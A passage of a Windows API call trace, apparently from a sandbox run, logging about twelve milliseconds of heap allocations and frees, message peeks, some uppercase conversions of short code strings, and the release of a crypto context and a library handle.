RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.342] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0248.342] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.342] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0248.343] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.343] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.343] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0248.343] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.343] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0248.343] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.343] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.344] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0248.344] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.344] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.344] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.345] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.345] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.345] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.345] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.346] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.346] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.346] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.346] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.346] CryptReleaseContext (hProv=0xad2830, dwFlags=0x0) returned 1 [0248.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.347] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.347] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.347] FreeLibrary (hLibModule=0x74d40000) returned 1 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.349] CloseHandle (hObject=0x2bc) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0248.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0248.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0248.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0248.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0248.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 